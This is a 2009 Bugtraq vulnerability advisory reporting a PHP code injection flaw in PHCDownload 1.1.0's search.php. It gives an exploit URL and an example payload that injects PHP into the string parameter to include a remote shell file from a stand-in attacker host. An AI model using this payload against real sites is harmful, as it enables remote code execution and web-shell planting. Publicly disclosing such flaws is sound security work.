[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090220171000.26405.qmail@securityfocus.com>
Date: 20 Feb 2009 17:10:00 -0000
From: contact@...rain.net
To: bugtraq@...urityfocus.com
Subject: PHCDownload 1.1.0 Vulnerabilities
A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy.
PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system.
Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vuls file: seach.php
Descripton: It is like remote file inclusion but you can run PHP code browser address. I don't know what is called.
Exploit: http://[site]/[path_to_script]/search.php
Input: ">< <?php PHP code here ?>
Example: http://[site]/[path_to_script]/search.php?string=">< <?php include("http://attacker_site/SHELL_FILE"); ?>
Powered by blists - more mailing lists